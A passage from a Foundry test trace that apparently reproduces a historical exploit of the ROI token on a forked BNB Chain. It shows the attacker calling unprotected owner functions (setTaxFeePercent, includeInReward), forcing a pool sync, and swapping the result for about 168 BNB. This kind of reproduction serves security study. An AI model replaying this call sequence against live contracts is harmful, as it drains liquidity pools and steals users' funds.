    │   │   ├─ [92068] ROI::transfer(BUSD/ROI Pair: [0x745D6Dd206906dd32b3f35E00533AD0963805124], 143430126920035 [1.434e14])
    │   │   │   ├─ emit Transfer(from: Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: BUSD/ROI Pair: [0x745D6Dd206906dd32b3f35E00533AD0963805124], value: 1434301269201 [1.434e12])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x9a37937c0ede8c307bf0496ec60e131422d44420befc187978dc5326d56d38a4: 0x00bbff16481c2c0b4a248d5b407328c77b9d17a38c8a445dec595f02d60ba604 → 0x00bb81061405cd3c6a7a2778bdf274157b956e07f4471e8ca703b22516291cd1
    │   │   │   │   @ 0x98f72c8a354d944d4283a924edb4088c47a087ea890af94eb300c0feab466742: 0x000ecce782adb868f736dbbcdbaf88c8bbc02281aae528c1e68c8a03d43902ba → 0x000ece2a3b84fbeba99ddc1469b8d98c66441c22aeca917318a2726bfef3047b
    │   │   │   │   @ 0xcbca2c2e1a1577eb2e25b9dce980a2cead88d4a5422449a454760a1d38d5b82a: 0x00000000000000000000000000000000000000000000000000008272edc3e163 → 0
    │   │   │   │   @ 11: 0xe9fc5ad740bb6d5efaf1ad8d95c8556ba8da88bbd3ffe88864e185c973d146fd → 0xe9fbde09c57c5212cdae4802a150f17d5356d8c13fa22b6851a1c153dea8bf8b
    │   │   │   │   @ 12: 0x000000000000000000000000000000000000000000000000000f46854a5db07a → 0x000000000000000000000000000000000000000000000000000fc7aa451d0d0c
    │   │   │   └─ ← [Return] true
    │   │   └─ ← [Stop]
    │   ├─ [40987] ROI::balanceOf(BUSD/ROI Pair: [0x745D6Dd206906dd32b3f35E00533AD0963805124]) [staticcall]
    │   │   └─ ← [Return] 4454304525010763 [4.454e15]
    │   ├─ [531] BUSD::balanceOf(BUSD/ROI Pair: [0x745D6Dd206906dd32b3f35E00533AD0963805124]) [staticcall]
    │   │   └─ ← [Return] 50844234521281227427355 [5.084e22]
    │   ├─ emit Sync(reserve0: 4454304525010763 [4.454e15], reserve1: 50844234521281227427355 [5.084e22])
    │   ├─ emit Swap(sender: Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], amount0In: 4454304525000763 [4.454e15], amount1In: 0, amount0Out: 4343012692003417 [4.343e15], amount1Out: 0, to: Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   ├─  storage changes:
    │   │   @ 8: 0x63197656000000000ac4457f78ce34c48e1b000000000000000f6df270c33169 → 0x63197656000000000ac4457f78ce34c48e1b000000000000000fd32a96ef474b
    │   └─ ← [Stop]
    ├─ [0] console::log("After flashloans from [BUSD/ROI Pair]") [staticcall]
    │   └─ ← [Stop]
    ├─ [870] ROI::balanceOf(Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ emit log_named_decimal_uint(key: "\tROI balance of attacker:", val: 0, decimals: 9)
    ├─ [531] BUSD::balanceOf(Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ emit log_named_decimal_uint(key: "\tBUSD balance of attacker:", val: 0, decimals: 18)
    ├─ [40987] ROI::balanceOf(BUSD/ROI Pair: [0x745D6Dd206906dd32b3f35E00533AD0963805124]) [staticcall]
    │   └─ ← [Return] 4454304525010763 [4.454e15]
    ├─ emit log_named_decimal_uint(key: "\tROI balance of BUSD/ROI Pair:", val: 4454304525010763 [4.454e15], decimals: 9)
    ├─ [531] BUSD::balanceOf(BUSD/ROI Pair: [0x745D6Dd206906dd32b3f35E00533AD0963805124]) [staticcall]
    │   └─ ← [Return] 50844234521281227427355 [5.084e22]
    ├─ emit log_named_decimal_uint(key: "\tBUSD balance of BUSD/ROI Pair:", val: 50844234521281227427355 [5.084e22], decimals: 18)
    ├─ [556] ROI::setTaxFeePercent(0)
    │   ├─  storage changes:
    │   │   @ 16: 99 → 0
    │   └─ ← [Stop]
    ├─ [10549] ROI::includeInReward(Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   ├─  storage changes:
    │   │   @ 9: 14 → 13
    │   │   @ 0x3707462b181da5757afb393000713f9d89955f52c38cceeebf01e0b050d6ff3e: 1 → 0
    │   │   @ 0x6e1540171b6c0c960b71a7020d9f60077f6af931a8bbf590da0223dacf75c7bc: 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496 → 0
    │   └─ ← [Stop]
    ├─ [46676] BUSD/ROI Pair::sync()
    │   ├─ [38233] ROI::balanceOf(BUSD/ROI Pair: [0x745D6Dd206906dd32b3f35E00533AD0963805124]) [staticcall]
    │   │   └─ ← [Return] 325973382708620 [3.259e14]
    │   ├─ [531] BUSD::balanceOf(BUSD/ROI Pair: [0x745D6Dd206906dd32b3f35E00533AD0963805124]) [staticcall]
    │   │   └─ ← [Return] 50844234521281227427355 [5.084e22]
    │   ├─ emit Sync(reserve0: 325973382708620 [3.259e14], reserve1: 50844234521281227427355 [5.084e22])
    │   ├─  storage changes:
    │   │   @ 8: 0x63197656000000000ac4457f78ce34c48e1b000000000000000fd32a96ef474b → 0x63197656000000000ac4457f78ce34c48e1b0000000000000001287897aebd8c
    │   └─ ← [Stop]
    ├─ [24749] ROI::approve(PancakeRouter: [0x10ED43C718714eb63d5aA57B78B54704E256024E], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ emit Approval(owner: Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: PancakeRouter: [0x10ED43C718714eb63d5aA57B78B54704E256024E], value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─  storage changes:
    │   │   @ 0x05fdfeb6d720d362d21836bf49dc3fee053b092fc8ec8957fadb64f910727cd5: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   └─ ← [Return] true
    ├─ [251954] PancakeRouter::swapExactTokensForETHSupportingFeeOnTransferTokens(3986806268542825 [3.986e15], 0, [0xE48b75dc1b131fd3A8364b0580f76eFD04cF6e9c, 0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56, 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c], Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1662613078 [1.662e9])
    │   ├─ [88966] ROI::transferFrom(Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], BUSD/ROI Pair: [0x745D6Dd206906dd32b3f35E00533AD0963805124], 3986806268542825 [3.986e15])
    │   │   ├─ emit Transfer(from: Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: BUSD/ROI Pair: [0x745D6Dd206906dd32b3f35E00533AD0963805124], value: 3986806268542825 [3.986e15])
    │   │   ├─ emit Approval(owner: Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: PancakeRouter: [0x10ED43C718714eb63d5aA57B78B54704E256024E], value: 115792089237316195423570985008687907853269984665640564039457580021106861097110 [1.157e77])
    │   │   ├─  storage changes:
    │   │   │   @ 0x05fdfeb6d720d362d21836bf49dc3fee053b092fc8ec8957fadb64f910727cd5: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xfffffffffffffffffffffffffffffffffffffffffffffffffff1d60554934096
    │   │   │   @ 0x98f72c8a354d944d4283a924edb4088c47a087ea890af94eb300c0feab466742: 0x000ece2a3b84fbeba99ddc1469b8d98c66441c22aeca917318a2726bfef3047b → 0x00c3e1a5c5f08fe226ed89e4a32a34d2db4dcd1e21b1c44c3b3be1fce60175ba
    │   │   │   @ 0x9a37937c0ede8c307bf0496ec60e131422d44420befc187978dc5326d56d38a4: 0x00bb81061405cd3c6a7a2778bdf274157b956e07f4471e8ca703b22516291cd1 → 0x00066d8a899a3945ed2a79a8848118cf068bbd0c815febb3846a42942f1aab92
    │   │   └─ ← [Return] true
    │   ├─ [893] BUSD/ROI Pair::getReserves() [staticcall]
    │   │   └─ ← [Return] 325973382708620 [3.259e14], 50844234521281227427355 [5.084e22], 1662613078 [1.662e9]
    │   ├─ [38233] ROI::balanceOf(BUSD/ROI Pair: [0x745D6Dd206906dd32b3f35E00533AD0963805124]) [staticcall]
    │   │   └─ ← [Return] 4312779651251445 [4.312e15]
    │   ├─ [56063] BUSD/ROI Pair::swap(0, 46992366331371533190745 [4.699e22], 0x58F876857a02D6762E0101bb5C46A8c1ED44Dc16, 0x)
    │   │   ├─ [3271] BUSD::transfer(0x58F876857a02D6762E0101bb5C46A8c1ED44Dc16, 46992366331371533190745 [4.699e22])
    │   │   │   ├─ emit Transfer(from: BUSD/ROI Pair: [0x745D6Dd206906dd32b3f35E00533AD0963805124], to: 0x58F876857a02D6762E0101bb5C46A8c1ED44Dc16, value: 46992366331371533190745 [4.699e22])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x3f78ef6f0a13ff5ebe2099feb686bb1e55bae2ea947609b08baac59bc1bf58b8: 0x0000000000000000000000000000000000000000004d2c7fc99b081b4e572f57 → 0x0000000000000000000000000000000000000000004d36733fb1b242f8e875b0
    │   │   │   │   @ 0x8807129717049b5cf8f3e4b04db574d1322eb46e5b63279e12e59026f7b70603: 0x000000000000000000000000000000000000000000000ac4457f78ce34c48e1b → 0x0000000000000000000000000000000000000000000000d0cf68cea68a3347c2
    │   │   │   └─ ← [Return] true
    │   │   ├─ [38233] ROI::balanceOf(BUSD/ROI Pair: [0x745D6Dd206906dd32b3f35E00533AD0963805124]) [staticcall]
    │   │   │   └─ ← [Return] 4312779651251445 [4.312e15]
    │   │   ├─ [531] BUSD::balanceOf(BUSD/ROI Pair: [0x745D6Dd206906dd32b3f35E00533AD0963805124]) [staticcall]
    │   │   │   └─ ← [Return] 3851868189909694236610 [3.851e21]
    │   │   ├─ emit Sync(reserve0: 4312779651251445 [4.312e15], reserve1: 3851868189909694236610 [3.851e21])
    │   │   ├─ emit Swap(sender: PancakeRouter: [0x10ED43C718714eb63d5aA57B78B54704E256024E], amount0In: 3986806268542825 [3.986e15], amount1In: 0, amount0Out: 0, amount1Out: 46992366331371533190745 [4.699e22], to: 0x58F876857a02D6762E0101bb5C46A8c1ED44Dc16)
    │   │   ├─  storage changes:
    │   │   │   @ 8: 0x63197656000000000ac4457f78ce34c48e1b0000000000000001287897aebd8c → 0x631976560000000000d0cf68cea68a3347c2000000000000000f5273431b7cf5
    │   │   └─ ← [Stop]
    │   ├─ [893] 0x58F876857a02D6762E0101bb5C46A8c1ED44Dc16::getReserves() [staticcall]
    │   │   └─ ← [Return] 334361473402502465911129 [3.343e23], 93297429499284008339976023 [9.329e25], 1662613078 [1.662e9]
    │   ├─ [531] BUSD::balanceOf(0x58F876857a02D6762E0101bb5C46A8c1ED44Dc16) [staticcall]
    │   │   └─ ← [Return] 93344421865615379873166768 [9.334e25]
    │   ├─ [38255] 0x58F876857a02D6762E0101bb5C46A8c1ED44Dc16::swap(167906931830792214995 [1.679e20], 0, PancakeRouter: [0x10ED43C718714eb63d5aA57B78B54704E256024E], 0x)
    │   │   ├─ [23162] WBNB::transfer(PancakeRouter: [0x10ED43C718714eb63d5aA57B78B54704E256024E], 167906931830792214995 [1.679e20])
    │   │   │   ├─ emit Transfer(from: 0x58F876857a02D6762E0101bb5C46A8c1ED44Dc16, to: PancakeRouter: [0x10ED43C718714eb63d5aA57B78B54704E256024E], value: 167906931830792214995 [1.679e20])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x1fb4de8f865d751e0e8d9986066405ce08df416aff5fdd6299ad70c234250abc: 0 → 0x0000000000000000000000000000000000000000000000091a2d40e41c1959d3
    │   │   │   │   @ 0xf1e03e4973193f89f2aa083d30a49755f07deae26a230485fdc9f8acee2c766f: 0x0000000000000000000000000000000000000000000046cdc5943890dc06f959 → 0x0000000000000000000000000000000000000000000046c4ab66f7acbfed9f86
    │   │   │   └─ ← [Return] true
    │   │   ├─ [534] WBNB::balanceOf(0x58F876857a02D6762E0101bb5C46A8c1ED44Dc16) [staticcall]
    │   │   │   └─ ← [Return] 334193566470671673696134 [3.341e23]
    │   │   ├─ [531] BUSD::balanceOf(0x58F876857a02D6762E0101bb5C46A8c1ED44Dc16) [staticcall]
    │   │   │   └─ ← [Return] 93344421865615379873166768 [9.334e25]
    │   │   ├─ emit Sync(reserve0: 334193566470671673696134 [3.341e23], reserve1: 93344421865615379873166768 [9.334e25])
    │   │   ├─ emit Swap(sender: PancakeRouter: [0x10ED43C718714eb63d5aA57B78B54704E256024E], amount0In: 0, amount1In: 46992366331371533190745 [4.699e22], amount0Out: 167906931830792214995 [1.679e20], amount1Out: 0, to: PancakeRouter: [0x10ED43C718714eb63d5aA57B78B54704E256024E])
    │   │   ├─  storage changes:
    │   │   │   @ 8: 0x631976560000004d2c7fc99b081b4e572f570000000046cdc5943890dc06f959 → 0x631976560000004d36733fb1b242f8e875b00000000046c4ab66f7acbfed9f86
    │   │   └─ ← [Stop]
    │   ├─ [534] WBNB::balanceOf(PancakeRouter: [0x10ED43C718714eb63d5aA57B78B54704E256024E]) [staticcall]
    │   │   └─ ← [Return] 167906931830792214995 [1.679e20]
    │   ├─ [9223] WBNB::withdraw(167906931830792214995 [1.679e20])
    │   │   ├─ [83] PancakeRouter::fallback{value: 167906931830792214995}()
    │   │   │   └─ ← [Stop]
    │   │   ├─ emit Withdrawal(src: PancakeRouter: [0x10ED43C718714eb63d5aA57B78B54704E256024E], wad: 167906931830792214995 [1.679e20])
    │   │   ├─  storage changes:
    │   │   │   @ 0x1fb4de8f865d751e0e8d9986066405ce08df416aff5fdd6299ad70c234250abc: 0x0000000000000000000000000000000000000000000000091a2d40e41c1959d3 → 0
    │   │   └─ ← [Stop]
    │   ├─ [55] Attacker::receive{value: 167906931830792214995}()
    │   │   └─ ← [Stop]
    │   └─ ← [Stop]
    ├─ [0] console::log("----------------------------------------------------") [staticcall]
    │   └─ ← [Stop]
    ├─ emit log_named_decimal_uint(key: "[End] Attacker BNB Balance:", val: 168331704163647122410 [1.683e20], decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 41.73s (39.62s CPU time)

Ran 2 test suites in 43.03s (43.21s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
